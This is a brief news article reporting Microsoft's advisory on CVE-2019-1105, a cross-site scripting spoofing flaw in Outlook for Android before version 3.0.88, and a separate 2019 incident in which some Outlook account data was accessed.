The technology giant Microsoft recently discovered a security vulnerability that exists in its Outlook for Android app. In its security advisory, Microsoft stated that the older versions prior to 3.0.88 of Outlook for Android carries a spoofing vulnerability that allows attackers to perform cross-site scripting (XSS) on mobile devices.
The security flaw, named as CVE-2019-1105, could be exploited by attackers by sending a specially crafted email message to the victims. Once compromised, the attackers can perform XSS attacks and run malicious scripts.
“A spoofing vulnerability exists in the way Microsoft Outlook for Android software parses specifically crafted email messages. An authenticated attacker could exploit the vulnerability by sending a specially crafted email message to a victim.” Microsoft said in its security advisory.
“The attacker who successfully exploited this vulnerability could then perform cross-site scripting attacks on the affected systems and run scripts in the security context of the current user. The security update addresses the vulnerability by correcting how Outlook for Android parses specially crafted email messages,” the statement added.
Microsoft stated the flaw was reported by multiple security researchers, including Bryan Appleby from F5 Networks, Sander Vanrapenbusch, Tom Wyckhuys, Eliraz Duek from CyberArk, and Gaurav Kumar. The company also clarified that it has mitigated the flaw and notified the users to update the Outlook applications on their devices.
Recently, Microsoft issued an alert to several users of over its mail platform Outlook hack. In a wordy notification, it stated hackers may have accessed data sent by several users on the platform between January 01, 2019, and March 28, 2019.
“Upon awareness of this issue, Microsoft immediately disabled the compromised credentials, prohibiting their use for any further unauthorized access. Our data indicate that account-related information (but not the content of any e-mails) could have been viewed, but Microsoft has no indication why that information was viewed or how it may have been used. As a result, you may receive phishing emails or other spam mails. You should be careful when receiving any e-mails from any misleading domain name, any e-mail that requests personal information or payment or any unsolicited request from an untrusted source,” it said in a statement.
According to Microsoft, apart from the contents of the emails which includes attachments, hackers may have also accessed email addresses, folder names, subject lines from both senders and recipients.
It is still unclear what the hackers target and why they launched an attack like this. “We addressed this scheme, which affected a limited subset of consumer accounts, by disabling the compromised credentials and blocking the perpetrators’ access,” the report quoted a Microsoft spokesperson as saying.